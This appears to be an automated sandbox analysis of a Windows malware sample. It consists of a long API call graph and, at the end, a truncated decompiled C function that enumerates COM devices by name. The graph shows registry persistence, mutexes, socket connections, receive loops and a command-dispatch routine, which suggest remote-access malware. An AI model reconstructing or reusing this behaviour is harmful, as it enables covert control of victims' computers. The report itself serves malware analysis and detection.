21283->21284 21285 2d13036 2 API calls 21284->21285 21286 2d159a3 21285->21286 21286->21169 21287->21261 21288->21265 21289->21174 21291 2d15e22 VirtualAlloc 21290->21291 21292 2d13600 lstrlenW 21291->21292 21297 2d15f31 21292->21297 21294 2d1361a lstrcpyW 21294->21176 21295->21180 21296->21182 21298 2d15f3d 21297->21298 21298->21294 21300 2d13389 21299->21300 21301 2d1338c lstrlenW 21299->21301 21300->21187 21301->21187 21303 2d1fef5 21302->21303 21304 2d2012e CloseHandle 21302->21304 21305 2d20283 ReleaseMutex FindCloseChangeNotification 21303->21305 21304->21303 21305->21199 21306->21201 21308 2d12e93 2 API calls 21307->21308 21309 2d123ec 21308->21309 21310 2d13437 3 API calls 21309->21310 21311 2d123f8 21310->21311 21312 2d13437 3 API calls 21311->21312 21313 2d12410 21312->21313 21314 2d13437 3 API calls 21313->21314 21315 2d12422 21314->21315 21316 2d13437 3 API calls 21315->21316 21317 2d1242e 21316->21317 21318 2d13437 3 API calls 21317->21318 21319 2d12440 21318->21319 21320 2d12e93 2 API calls 21319->21320 21321 2d1246a 21320->21321 21321->20807 21322->20814 21372 2d13261 21323->21372 21325 2d13347 21326 2d13261 lstrlenW 21325->21326 21327 2d13350 21326->21327 21375 2d15e46 21327->21375 21330->20820 21331->20826 21332->20832 21333->20838 21335 2d210b1 RegOpenKeyExW 21334->21335 21336 2d2107e 21334->21336 21337 2d210c5 21335->21337 21388 2d1f731 RegOpenKeyExW 21336->21388 21337->20841 21337->20847 21343 2d20fc3 RegQueryValueExW 21337->21343 21339 2d21088 21339->21335 21340 2d2108c RegCreateKeyExW 21339->21340 21340->21337 21341 2d210aa 21340->21341 21393 2d20fae 21341->21393 21344 2d20ff0 21343->21344 21351 2d2102a 21343->21351 21396 2d11085 GetProcessHeap RtlAllocateHeap 21344->21396 21346 2d20ff8 RegQueryValueExW 21347 2d21014 21346->21347 21346->21351 21348 2d12f91 6 API calls 21347->21348 21349 2d21020 21348->21349 21349->21351 21397 2d11099 GetProcessHeap HeapFree 21349->21397 21351->20847 21351->20849 21398 2d11085 GetProcessHeap RtlAllocateHeap 21352->21398 21354 2d12ee6 21355 2d135e5 4 API calls 21354->21355 21356 2d12f0e 21355->21356 21357 2d12f18 21356->21357 21399 2d11099 GetProcessHeap HeapFree 21356->21399 21357->20860 21359->20863 21400 2d11085 GetProcessHeap RtlAllocateHeap 21360->21400 21362 2d1f493 GetModuleFileNameW 21363 2d135e5 4 API calls 21362->21363 21364 2d1f4b1 21363->21364 21365 2d13437 3 API calls 21364->21365 21366 2d1f4b9 21365->21366 21401 2d15ea5 VirtualFree 21366->21401 21368 2d1f4c1 21402 2d11099 GetProcessHeap HeapFree 21368->21402 21370 2d1f4c7 21370->20850 21371->20842 21373 2d13266 lstrlenW 21372->21373 21374 2d1326f 21372->21374 21373->21325 21374->21325 21376 2d15e61 21375->21376 21377 2d15e5c 21375->21377 21379 2d15e71 21376->21379 21386 2d15eb4 VirtualAlloc 21376->21386 21383 2d15e02 21377->21383 21381 2d13360 lstrcatW 21379->21381 21387 2d15ea5 VirtualFree 21379->21387 21381->20818 21384 2d15e10 VirtualQuery 21383->21384 21385 2d15e0c 21383->21385 21384->21376 21385->21376 21386->21379 21387->21381 21389 2d1f752 21388->21389 21390 2d1f756 21388->21390 21389->21339 21391 2d1f765 21390->21391 21392 2d1f75c RegCloseKey 21390->21392 21391->21339 21392->21391 21394 2d20fb6 RegCloseKey 21393->21394 21395 2d20fbe 21393->21395 21394->21395 21395->21335 21396->21346 21397->21351 21398->21354 21399->21357 21400->21362 21401->21368 21402->21370 21404 2d131c3 VirtualAlloc 21403->21404 21405 2d158dc 21404->21405 21426 2d20298 CreateMutexA 21405->21426 21407 2d158f6 WSAStartup 21407->20867 21409 2d1304c 2 API calls 21408->21409 21410 2d11dea 21409->21410 21411 2d1362d 3 API calls 21410->21411 21412 2d11df6 21411->21412 21413 2d1362d 3 API calls 21412->21413 21414 2d11e0e 21413->21414 21415 2d1362d 3 API calls 21414->21415 21416 2d11e20 21415->21416 21417 2d1362d 3 API calls 21416->21417 21418 2d11e2c 21417->21418 21419 2d1362d 3 API calls 21418->21419 21420 2d11e3e 21419->21420 21421 2d1304c 2 API calls 21420->21421 21422 2d11e68 21421->21422 21423 2d131c3 21422->21423 21424 2d15e22 VirtualAlloc 21423->21424 21425 2d131ce 21424->21425 21425->20701 21426->21407 21427->20879 21428->20881 21502 2d11085 GetProcessHeap RtlAllocateHeap 21429->21502 21431 2d134c3 21503 2d132bf 21431->21503 21435 2d13514 21436 2d20f6e RegCreateKeyExW 21435->21436 21437 2d20f99 21436->21437 21437->20892 21539 2d11052 21438->21539 21441 2d135e5 4 API calls 21442 2d1f7b0 21441->21442 21442->20900 21443->20912 21444->20920 21446 2d135e5 4 API calls 21445->21446 21447 2d1347b 21446->21447 21448 2d13335 5 API calls 21447->21448 21449 2d13483 21448->21449 21541 2d15ea5 VirtualFree 21449->21541 21451 2d1348b 21451->20943 21452->20953 21454 2d13384 lstrlenW 21453->21454 21455 2d13237 21454->21455 21456 2d12f91 6 API calls 21455->21456 21457 2d13240 21456->21457 21457->20966 21459 2d21043 RegSetValueExW 21458->21459 21460 2d21062 21458->21460 21459->21460 21460->20981 21462 2d131c3 VirtualAlloc 21461->21462 21463 2d13567 21462->21463 21464 2d135d3 21463->21464 21465 2d13261 lstrlenW 21463->21465 21464->20958 21466 2d13578 WideCharToMultiByte 21465->21466 21542 2d15eb4 VirtualAlloc 21466->21542 21468 2d13590 21469 2d13261 lstrlenW 21468->21469 21470 2d135a2 WideCharToMultiByte 21469->21470 21471 2d133bf 4 API calls 21470->21471 21472 2d135bb 21471->21472 21543 2d13125 21472->21543 21476 2d135cc 21552 2d15ea5 VirtualFree 21476->21552 21479 2d212e0 21478->21479 21480 2d21d5c WriteFile FindCloseChangeNotification 21478->21480 21481 2d15ea5 VirtualFree 21479->21481 21480->21479 21481->20974 21482->20978 21483->21003 21484->21005 21485->20925 21486->20935 21487->21010 21488->21014 21489->21018 21490->21011 21491->21015 21492->21019 21493->20903 21495 2d13384 lstrlenW 21494->21495 21496 2d12ff2 21495->21496 21497 2d12f91 6 API calls 21496->21497 21498 2d12ffb 21497->21498 21498->20942 21499->20952 21500->20939 21501->20918 21502->21431 21504 2d133bf 4 API calls 21503->21504 21505 2d132d5 21504->21505 21515 2d1309d 21505->21515 21508 2d13335 5 API calls 21509 2d132e4 21508->21509 21532 2d15ea5 VirtualFree 21509->21532 21511 2d132ec 21533 2d15ea5 VirtualFree 21511->21533 21513 2d132f8 21514 2d11099 GetProcessHeap HeapFree 21513->21514 21514->21435 21534 2d1308c 21515->21534 21517 2d130b4 21518 2d1311c 21517->21518 21519 2d1308c lstrlenA 21517->21519 21518->21508 21520 2d130c1 MultiByteToWideChar 21519->21520 21521 2d15e22 VirtualAlloc 21520->21521 21522 2d130db 21521->21522 21523 2d1308c lstrlenA 21522->21523 21524 2d130e5 MultiByteToWideChar 21523->21524 21525 2d135e5 4 API calls 21524->21525 21526 2d13104 21525->21526 21527 2d13437 3 API calls 21526->21527 21528 2d1310d 21527->21528 21537 2d15ea5 VirtualFree 21528->21537 21530 2d13115 21538 2d15ea5 VirtualFree 21530->21538 21532->21511 21533->21513 21535 2d13091 lstrlenA 21534->21535 21536 2d1309a 21534->21536 21535->21517 21536->21517 21537->21530 21538->21518 21540 2d1105a SHGetSpecialFolderPathW 21539->21540 21540->21441 21541->21451 21542->21468 21553 2d15ea5 VirtualFree 21543->21553 21545 2d13133 21546 2d13157 21545->21546 21554 2d13372 21545->21554 21551 2d15ea5 VirtualFree 21546->21551 21548 2d13145 21549 2d15e22 VirtualAlloc 21548->21549 21550 2d1314c lstrcatA 21549->21550 21550->21546 21551->21476 21552->21464 21553->21545 21555 2d13381 21554->21555 21556 2d13377 lstrlenA 21554->21556 21555->21548 21556->21548 21557->21027 21559 2d13036 2 API calls 21558->21559 21560 2d15c22 21559->21560 21571 2d15ea5 VirtualFree 21560->21571 21562 2d15c2a 21572 2d15ea5 VirtualFree 21562->21572 21564 2d15c37 21573 2d15ea5 VirtualFree 21564->21573 21566 2d15c42 21574 2d15ea5 VirtualFree 21566->21574 21568 2d15c4d 21575 2d15ea5 VirtualFree 21568->21575 21570 2d15c58 21571->21562 21572->21564 21573->21566 21574->21568 21575->21570 21597 2d2094e GetPEB 21576->21597 21580 2d1f7f9 21580->21058 21582 2d21931 21581->21582 21583 2d218d1 SetSecurityDescriptorDacl 21581->21583 21582->21062 21583->21582 21584 2d218e5 RegCreateKeyExA 21583->21584 21585 2d2192a SetLastError 21584->21585 21586 2d2191d RegCloseKey 21584->21586 21585->21582 21586->21582 21588 2d21884 SetLastError 21587->21588 21589 2d2188f RegSetValueExA RegCloseKey 21587->21589 21591 2d218b5 21588->21591 21589->21588 21589->21591 21591->21066 21593 2d2094e GetPEB 21592->21593 21594 2d1f7c1 21593->21594 21595 2d20969 lstrcmpA 21594->21595 21596 2d1f7d2 21594->21596 21595->21596 21596->21068 21598 2d1f7e8 21597->21598 21598->21580 21599 2d20969 21598->21599 21602 2d20983 21599->21602 21600 2d209b5 21600->21580 21601 2d20999 lstrcmpA 21601->21600 21601->21602 21602->21600 21602->21601 21604 2d219f3 RegCreateKeyExW 21603->21604 21605 2d21a0c lstrlenW RegSetValueExW RegCloseKey 21603->21605 21604->21605 21605->21079 21611 2d11085 GetProcessHeap RtlAllocateHeap 21606->21611 21608 2d21949 VirtualProtect VirtualAlloc GetWindowsDirectoryW lstrlenW 21610 2d219b3 21608->21610 21610->21074 21611->21608 21613 2d11052 21612->21613 21614 2d220e3 Process32First 21613->21614 21616 2d220fc 21614->21616 21615 2d22125 CloseHandle 21617 2d2212e 21615->21617 21616->21615 21616->21617 21618 2d22113 Process32Next 21616->21618 21617->21092 21618->21616 21624 2d11085 GetProcessHeap RtlAllocateHeap 21619->21624 21621 2d2200e GetModuleFileNameA 21625 2d11172 21621->21625 21623 2d22028 6 API calls 21623->21086 21624->21621 21626 2d1117a 21625->21626 21626->21623 21626->21626 21628 2d13125 4 API calls 21627->21628 21629 2d15813 21628->21629 21667 2d2026f WaitForSingleObject 21629->21667 21631 2d15824 getaddrinfo 21632 2d15852 socket 21631->21632 21633 2d158ac 21631->21633 21632->21633 21634 2d1586d htons freeaddrinfo connect 21632->21634 21668 2d15ea5 VirtualFree 21633->21668 21634->21633 21635 2d158c2 ReleaseMutex 21634->21635 21635->21633 21637 2d158b9 21637->21098 21639 2d1563c 21638->21639 21640 2d157f4 21639->21640 21641 2d1564b setsockopt 21639->21641 21640->21102 21642 2d1567c 21641->21642 21643 2d133bf 4 API calls 21642->21643 21644 2d15692 21643->21644 21669 2d13003 21644->21669 21648 2d156a9 recv 21650 2d156a3 21648->21650 21649 2d12f91 6 API calls 21649->21650 21650->21648 21650->21649 21651 2d157dc 21650->21651 21655 2d1304c GetProcessHeap RtlAllocateHeap 21650->21655 21658 2d160aa GetProcessHeap RtlFreeHeap GetProcessHeap RtlAllocateHeap 21650->21658 21659 2d15713 recv 21650->21659 21660 2d13036 GetProcessHeap RtlFreeHeap 21650->21660 21665 2d12fc3 GetProcessHeap RtlFreeHeap 21650->21665 21675 2d14f65 21650->21675 21652 2d13036 2 API calls 21651->21652 21653 2d157e4 21652->21653 21654 2d13036 2 API calls 21653->21654 21656 2d157ec 21654->21656 21655->21650 21657 2d13036 2 API calls 21656->21657 21657->21640 21658->21650 21659->21650 21661 2d157cc 21659->21661 21660->21650 21662 2d13036 2 API calls 21661->21662 21663 2d157d4 21662->21663 21664 2d13036 2 API calls 21663->21664 21664->21651 21665->21650 21667->21631 21668->21637 21670 2d13372 lstrlenA 21669->21670 21671 2d1301b 21670->21671 21672 2d12f91 6 API calls 21671->21672 21673 2d13024 21672->21673 21674 2d15ea5 VirtualFree 21673->21674 21674->21650 21676 2d14f7a 21675->21676 21677 2d14f8f 21675->21677 21676->21677 21678 2d1553f 21676->21678 21796 2d12fc3 21676->21796 21677->21678 21680 2d12f91 6 API calls 21677->21680 21678->21650 21681 2d14fde 21680->21681 21682 2d15285 21681->21682 21683 2d14ff2 21681->21683 21684 2d1527d 21681->21684 21685 2d153ec 21682->21685 21688 2d153e4 21682->21688 21689 2d152a9 21682->21689 21770 2d15031 21682->21770 21686 2d15144 21683->21686 21687 2d14ffb 21683->21687 21820 2d15f53 GetProcessHeap HeapAlloc 21684->21820 21690 2d1548f 21685->21690 21700 2d15410 21685->21700 21701 2d15487 21685->21701 21685->21770 21695 2d1514d 21686->21695 21696 2d151ff 21686->21696 21693 2d15004 21687->21693 21694 2d15126 21687->21694 21829 2d15f53 GetProcessHeap HeapAlloc 21688->21829 21697 2d152b2 21689->21697 21698 2d15377 21689->21698 21690->21770 21834 2d15f53 GetProcessHeap HeapAlloc 21690->21834 21703 2d150c2 21693->21703 21704 2d1500c 21693->21704 21811 2d15f53 GetProcessHeap HeapAlloc 21694->21811 21705 2d15153 21695->21705 21706 2d151e2 21695->21706 21711 2d15206 21696->21711 21712 2d15258 21696->21712 21707 2d15357 21697->21707 21708 2d152b8 21697->21708 21714 2d153c6 21698->21714 21715 2d1537c 21698->21715 21709 2d15471 21700->21709 21710 2d15416 21700->21710 21833 2d15f53 GetProcessHeap HeapAlloc 21701->21833 21732 2d150c7 21703->21732 21733 2d1510c 21703->21733 21718 2d150a1 21704->21718 21719 2d15012 21704->21719 21727 2d151c5 21705->21727 21728 2d15158 21705->21728 21816 2d15f53 GetProcessHeap HeapAlloc 21706->21816 21825 2d15f53 GetProcessHeap HeapAlloc 21707->21825 21720 2d1533a 21708->21720 21721 2d152bd 21708->21721 21832 2d15f53 GetProcessHeap HeapAlloc 21709->21832 21729 2d1546a 21710->21729 21772 2d1541c 21710->21772 21725 2d15233 21711->21725 21726 2d1520c 21711->21726 21819 2d15f53 GetProcessHeap HeapAlloc 21712->21819 21828 2d15f53 GetProcessHeap HeapAlloc 21714->21828 21716 2d15382 21715->21716 21717 2d153a9 21715->21717 21716->21770 21826 2d15f53 GetProcessHeap HeapAlloc 21716->21826 21827 2d15f53 GetProcessHeap HeapAlloc 21717->21827 21804 2d15f53 GetProcessHeap HeapAlloc 21718->21804 21741 2d15084 21719->21741 21742 2d15016 21719->21742 21824 2d15f53 GetProcessHeap HeapAlloc 21720->21824 21734 2d152c3 21721->21734 21735 2d1531d 21721->21735 21818 2d15f53 GetProcessHeap HeapAlloc 21725->21818 21726->21770 21817 2d15f53 GetProcessHeap HeapAlloc 21726->21817 21815 2d15f53 GetProcessHeap HeapAlloc 21727->21815 21738 2d151a8 21728->21738 21739 2d1515e 21728->21739 21736 2d21a3c 21 API calls 21729->21736 21748 2d150f2 21732->21748 21749 2d150cd 21732->21749 21810 2d15f53 GetProcessHeap HeapAlloc 21733->21810 21751 2d15300 21734->21751 21752 2d152c9 21734->21752 21823 2d15f53 GetProcessHeap HeapAlloc 21735->21823 21736->21770 21814 2d15f53 GetProcessHeap HeapAlloc 21738->21814 21755 2d15164 21739->21755 21756 2d1518b 21739->21756 21803 2d15f53 GetProcessHeap HeapAlloc 21741->21803 21759 2d15067 21742->21759 21760 2d1501c 21742->21760 21746 2d15452 21750 2d21ab9 28 API calls 21746->21750 21746->21770 21809 2d15f53 GetProcessHeap HeapAlloc 21748->21809 21749->21770 21805 2d15f53 GetProcessHeap HeapAlloc 21749->21805 21750->21770 21822 2d15f53 GetProcessHeap HeapAlloc 21751->21822 21752->21770 21821 2d15f53 GetProcessHeap HeapAlloc 21752->21821 21755->21770 21812 2d15f53 GetProcessHeap HeapAlloc 21755->21812 21813 2d15f53 GetProcessHeap HeapAlloc 21756->21813 21802 2d15f53 GetProcessHeap HeapAlloc 21759->21802 21768 2d15022 21760->21768 21769 2d1504a 21760->21769 21763 2d15439 21763->21770 21831 2d15f53 GetProcessHeap HeapAlloc 21763->21831 21768->21770 21800 2d15f53 GetProcessHeap HeapAlloc 21768->21800 21801 2d15f53 GetProcessHeap HeapAlloc 21769->21801 21776 2d154d8 21770->21776 21777 2d1552a 21770->21777 21772->21746 21772->21763 21772->21770 21830 2d15f53 GetProcessHeap HeapAlloc 21772->21830 21773 2d150dc 21773->21770 21806 2d13cd3 21773->21806 21780 2d1304c 2 API calls 21776->21780 21782 2d12fc3 2 API calls 21777->21782 21784 2d154e4 21780->21784 21795 2d15528 21782->21795 21785 2d12e4c 8 API calls 21784->21785 21786 2d15500 21785->21786 21788 2d12e93 2 API calls 21786->21788 21787 2d12fc3 2 API calls 21787->21678 21789 2d1550c 21788->21789 21790 2d14f65 56 API calls 21789->21790 21791 2d15518 21790->21791 21792 2d13036 2 API calls 21791->21792 21793 2d15520 21792->21793 21794 2d13036 2 API calls 21793->21794 21794->21795 21795->21678 21795->21787 21797 2d12fd1 21796->21797 21798 2d12fcc 21796->21798 21797->21677 21835 2d15eee GetProcessHeap RtlFreeHeap 21798->21835 21800->21770 21801->21770 21802->21770 21803->21770 21804->21770 21805->21773 21807 2d131c3 VirtualAlloc 21806->21807 21808 2d13ce4 21807->21808 21808->21770 21809->21770 21810->21770 21811->21770 21812->21770 21813->21770 21814->21770 21815->21770 21816->21770 21817->21770 21818->21770 21819->21770 21820->21682 21821->21770 21822->21770 21823->21770 21824->21770 21825->21770 21826->21770 21827->21770 21828->21770 21829->21685 21830->21763 21831->21746 21832->21770 21833->21690 21834->21770 21835->21797 21836->21112 21837->21107 21838 2d1122b 21841 2d1e703 InitializeCriticalSection 21838->21841 21893 2d15f53 GetProcessHeap HeapAlloc 21841->21893 21843 2d1e752 21894 2d132ff 21843->21894 21846 2d132ff 9 API calls 21847 2d1e79b 21846->21847 21848 2d135e5 4 API calls 21847->21848 21849 2d1e7a8 21848->21849 21904 2d131d4 21849->21904 21852 2d13437 3 API calls 21853 2d1e7bd 21852->21853 21909 2d15ea5 VirtualFree 21853->21909 21855 2d1e7c5 21910 2d15ea5 VirtualFree 21855->21910 21857 2d1e7d0 21911 2d1fc58 GetCurrentProcess 21857->21911 21860 2d1e7da 21863 2d132ff 9 API calls 21860->21863 21861 2d1e80f 21862 2d131d4 5 API calls 21861->21862 21864 2d1e819 21862->21864 21865 2d1e7e6 21863->21865 21866 2d13437 3 API calls 21864->21866 21867 2d131d4 5 API calls 21865->21867 21868 2d1e826 21866->21868 21869 2d1e7f0 21867->21869 21916 2d15ea5 VirtualFree 21868->21916 21871 2d13437 3 API calls 21869->21871 21873 2d1e7fd 21871->21873 21872 2d1e80d 21874 2d1346a 9 API calls 21872->21874 21914 2d15ea5 VirtualFree 21873->21914 21876 2d1e83b 21874->21876 21878 2d1346a 9 API calls 21876->21878 21877 2d1e805 21879 2d132ff 9 API calls 21877->21879 21880 2d1e843 21878->21880 21879->21872 21881 2d1346a 9 API calls 21880->21881 21882 2d1e852 21881->21882 21915 2d1f71f SHCreateDirectoryExW 21882->21915 21884 2d1e859 21885 2d13437 3 API calls 21884->21885 21886 2d1e866 21885->21886 21887 2d1346a 9 API calls 21886->21887 21888 2d1e872 21887->21888 21889 2d1346a 9 API calls 21888->21889 21890 2d1e87f 21889->21890 21891 2d1346a 9 API calls 21890->21891 21892 2d11230 21891->21892 21893->21843 21895 2d1330b 21894->21895 21898 2d13310 21894->21898 21918 2d15ea5 VirtualFree 21895->21918 21897 2d135e5 4 API calls 21899 2d1331e 21897->21899 21898->21897 21900 2d13335 5 API calls 21899->21900 21901 2d13326 21900->21901 21917 2d15ea5 VirtualFree 21901->21917 21903 2d1332e 21903->21846 21905 2d11052 21904->21905 21906 2d131f6 ExpandEnvironmentStringsW 21905->21906 21907 2d135e5 4 API calls 21906->21907 21908 2d1321b 21907->21908 21908->21852 21909->21855 21910->21857 21919 2d20c36 GetModuleHandleA GetProcAddress 21911->21919 21914->21877 21915->21884 21916->21872 21917->21903 21918->21898 21920 2d1e7d5 21919->21920 21920->21860 21920->21861 21921 2d1121c 21924 2d199a8 21921->21924 21935 2d11875 21924->21935 21927 2d1fece CreateMutexA 21928 2d199e3 LoadLibraryW 21927->21928 21929 2d20969 lstrcmpA 21928->21929 21930 2d19a13 21929->21930 21931 2d20969 lstrcmpA 21930->21931 21932 2d19a24 21931->21932 21933 2d20969 lstrcmpA 21932->21933 21934 2d11221 21933->21934 21938 2d15f53 GetProcessHeap HeapAlloc 21935->21938 21937 2d1189e InitializeCriticalSection 21937->21927 21938->21937 21939 2d111ef 21942 2d22408 21939->21942 21949 2d20298 CreateMutexA 21942->21949 21944 2d2241d 21950 2d15f53 GetProcessHeap HeapAlloc 21944->21950 21946 2d22425 21947 2d111f4 21946->21947 21951 2d22ed4 21946->21951 21949->21944 21950->21946 21963 2d15f53 GetProcessHeap HeapAlloc 21951->21963 21953 2d22ef4 21964 2d15f53 GetProcessHeap HeapAlloc 21953->21964 21955 2d22f1e 21956 2d22f2a 21955->21956 21974 2d2266a 21955->21974 21965 2d2290f CoInitialize CoCreateInstance 21956->21965 21960 2d22f4a 21960->21947 21961 2d22f3c 21961->21960 21977 2d2273a CoInitialize CoCreateInstance 21961->21977 21963->21953 21964->21955 21966 2d22a66 21965->21966 21972 2d2294f 21965->21972 21966->21960 21966->21961 21968 2d22996 VariantInit 21968->21972 21969 2d22a40 CoUninitialize 21969->21966 21972->21966 21972->21968 21972->21969 21972->21972 21988 2d15f53 GetProcessHeap HeapAlloc 21972->21988 21989 2d22bc7 21972->21989 21994 2d12481 21972->21994 21975 2d22bc7 2 API calls 21974->21975 21976 2d2267b 21975->21976 21976->21956 21978 2d22786 21977->21978 21979 2d228aa CoUninitialize 21977->21979 21978->21979 22001 2d22a6b 21978->22001 21979->21961 21982 2d227b0 21982->21979 21983 2d227b9 CoCreateInstance 21982->21983 21983->21979 21984 2d227d7 21983->21984 21984->21979 22005 2d224eb 21984->22005 21988->21972 21998 2d15df1 GetProcessHeap HeapAlloc 21989->21998 21991 2d22bd2 21999 2d15df1 GetProcessHeap HeapAlloc 21991->21999 21993 2d22bde 21993->21972 21995 2d12490 21994->21995 21997 2d124ad 21994->21997 22000 2d15f53 GetProcessHeap HeapAlloc 21995->22000 21997->21972 21998->21991 21999->21993 22000->21997 22015 2d22447 CoInitialize CoCreateInstance 22001->22015 22003 2d22a7d CoCreateInstance 22004 2d22aa6 22003->22004 22004->21982 22006 2d224f6 CoTaskMemFree 22005->22006 22007 2d22505 22005->22007 22006->22007 22008 2d22b2a 22007->22008 22009 2d15ca3 3 API calls 22008->22009 22010 2d22b40 22009->22010 22011 2d15ca3 3 API calls 22010->22011 22012 2d22b57 22011->22012 22013 2d15ca3 3 API calls 22012->22013 22014 2d22b90 22013->22014 22014->21979 22016 2d224df CoUninitialize 22015->22016 22017 2d2247b 22015->22017 22016->22003 22017->22016 22018 2d19fce 22019 2d15ea5 VirtualFree 22018->22019 22020 2d19fd9 22018->22020 22021 2d111fe 22024 2d23b5e 22021->22024 22097 2d12550 22024->22097 22027 2d12550 VirtualAlloc 22028 2d23b7b 22027->22028 22029 2d12550 VirtualAlloc 22028->22029 22030 2d23b85 22029->22030 22031 2d12550 VirtualAlloc 22030->22031 22032 2d23b8f 22031->22032 22033 2d12550 VirtualAlloc 22032->22033 22034 2d23b99 22033->22034 22035 2d12550 VirtualAlloc 22034->22035 22036 2d23ba3 22035->22036 22100 2d11085 GetProcessHeap RtlAllocateHeap 22036->22100 22038 2d23bca 22101 2d11085 GetProcessHeap RtlAllocateHeap 22038->22101 22040 2d23bd3 22102 2d11085 GetProcessHeap RtlAllocateHeap 22040->22102 22042 2d23bdc 22103 2d11085 GetProcessHeap RtlAllocateHeap 22042->22103 22044 2d23be5 22104 2d11085 GetProcessHeap RtlAllocateHeap 22044->22104 22046 2d23bef 22105 2d11085 GetProcessHeap RtlAllocateHeap 22046->22105 22048 2d23bf9 22106 2d21ce2 22048->22106 22051 2d21ce2 2 API calls 22052 2d23c0a 22051->22052 22053 2d21ce2 2 API calls 22052->22053 22054 2d23c11 22053->22054 22055 2d21ce2 2 API calls 22054->22055 22056 2d23c19 22055->22056 22057 2d21ce2 2 API calls 22056->22057 22058 2d23c21 22057->22058 22059 2d21ce2 2 API calls 22058->22059 22060 2d23c29 22059->22060 22061 2d133bf 4 API calls 22060->22061 22062 2d23c35 22061->22062 22110 2d1fda5 22062->22110 22064 2d23c40 22113 2d15ea5 VirtualFree 22064->22113 22066 2d23c48 22067 2d133bf 4 API calls 22066->22067 22068 2d23c52 22067->22068 22069 2d1fda5 5 API calls 22068->22069 22070 2d23c5d 22069->22070 22114 2d15ea5 VirtualFree 22070->22114 22072 2d23c65 22073 2d133bf 4 API calls 22072->22073 22074 2d23c6f 22073->22074 22075 2d1fda5 5 API calls 22074->22075 22076 2d23c7a 22075->22076 22115 2d15ea5 VirtualFree 22076->22115 22078 2d23c82 22079 2d133bf 4 API calls 22078->22079 22080 2d23c8e 22079->22080 22081 2d1fda5 5 API calls 22080->22081 22082 2d23c99 22081->22082 22116 2d15ea5 VirtualFree 22082->22116 22084 2d23ca1 22085 2d133bf 4 API calls 22084->22085 22086 2d23cad 22085->22086 22087 2d1fda5 5 API calls 22086->22087 22088 2d23cb8 22087->22088 22117 2d15ea5 VirtualFree 22088->22117 22090 2d23cc0 22091 2d133bf 4 API calls 22090->22091 22092 2d23ccc 22091->22092 22093 2d1fda5 5 API calls 22092->22093 22094 2d23cd7 22093->22094 22118 2d15ea5 VirtualFree 22094->22118 22096 2d11203 22119 2d1fdd1 22097->22119 22100->22038 22101->22040 22102->22042 22103->22044 22104->22046 22105->22048 22107 2d21ce8 22106->22107 22109 2d21d05 22107->22109 22122 2d21d0c Sleep GetTickCount 22107->22122 22109->22051 22111 2d13125 4 API calls 22110->22111 22112 2d1fdb7 CreateEventA 22111->22112 22112->22064 22113->22066 22114->22072 22115->22078 22116->22084 22117->22090 22118->22096 22120 2d131c3 VirtualAlloc 22119->22120 22121 2d12563 22120->22121 22121->22027 22122->22107

                                                                    Executed Functions

                                                                    Function 02D2290F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 138comCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 284 2d2290f-2d22949 CoInitialize CoCreateInstance 285 2d22a66-2d22a6a 284->285 286 2d2294f-2d2295b 284->286 287 2d2295f-2d22964 286->287 287->285 288 2d2296a-2d22972 287->288 290 2d22a22-2d22a3a 288->290 292 2d22a40-2d22a45 290->292 293 2d22977-2d22990 290->293 294 2d22a50-2d22a55 292->294 295 2d22a47-2d22a4d 292->295 293->292 300 2d22996-2d229b5 VariantInit 293->300 296 2d22a60 CoUninitialize 294->296 297 2d22a57-2d22a5d 294->297 295->294 296->285 297->296 303 2d229b7-2d229cc 300->303 304 2d229ce-2d229d8 call 2d15f53 300->304 303->292 303->304 308 2d229e5 304->308 309 2d229da-2d229e3 call 2d22bc7 304->309 311 2d229e7-2d229f0 308->311 309->311 313 2d229f2 311->313 314 2d22a10-2d22a20 call 2d12481 311->314 315 2d229f4-2d22a0e 313->315 314->290 315->314 315->315
                                                                    C-Code - Quality: 59%
                                                                    			E02D2290F(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0);
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x2d245e0, 0, 1, 0x2d273f0, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x2d245d0,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t50 = _v24 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x2d24560,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E02D15F53(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E02D22BC7(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E02D12481(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
